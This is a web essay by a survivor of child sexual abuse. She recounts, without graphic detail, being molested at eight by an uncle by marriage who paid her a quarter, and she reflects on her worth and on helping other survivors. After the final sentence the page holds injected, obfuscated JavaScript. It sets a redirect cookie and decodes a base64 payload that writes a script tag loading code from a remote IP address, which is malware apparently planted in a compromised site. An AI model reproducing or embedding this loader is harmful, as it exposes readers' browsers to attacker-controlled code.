Today can you buy something for one quarter – 25 cents?
Well, that is how much I was offered to give oral sex to a man. Now, it was not just a proposition for sex – I was 8 and he was 33. It was on a typical Sunday visit to the in-law in a distance city. He never had a history of police record. He was a law abiding person, who had a family and was well mannered and went to church sometimes. This sounds like a ‘GOOD’ person, does it not? No!! It was a ‘child molester in disguise’. He was an Uncle by marriage, so there was no blood relation. Does anyone know the impact that this has on an adult when they were sexually molested as a child and live to tell the world what really happened? Do you know the nightmares, the horror, anger, fear, and more?
After the ‘Good Uncle’ molested me, he gave me 25 cents to buy popsicles. The money was for me to practice on the popsicles so that I could perform oral sex on him the next time I saw him. In those days, 25 cents could buy five popsicles – that was a lot, because they would come double.
What would policeman say to a man giving money to a girl for sex? Now that was years ago. What if I would have saved the money, could he have done anything? Probably not. But I can share this true experience with the world of survivors so they may be helped. What works for one survivor may not work for another. We are all different.
Giving money for sexual favors is a crime, but the actual incident of giving money for popsicles is not. But is that all an eight year old is worth – 25 cents? I can remember that the quarter was pure silver – copper was not mixed in yet. At eight, this was a lot of money to me. Today, it cannot even buy a first class stamp.
Before he molested me, that was the act he wanted, oral sex. But I didn’t do it, so he gave me the money to buy something to practice on. I wonder if he could read this article, would he feel differently. Money is worth a lot when it is given the right way and in a good manner.
I know I am worth more than one quarter!! ..match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
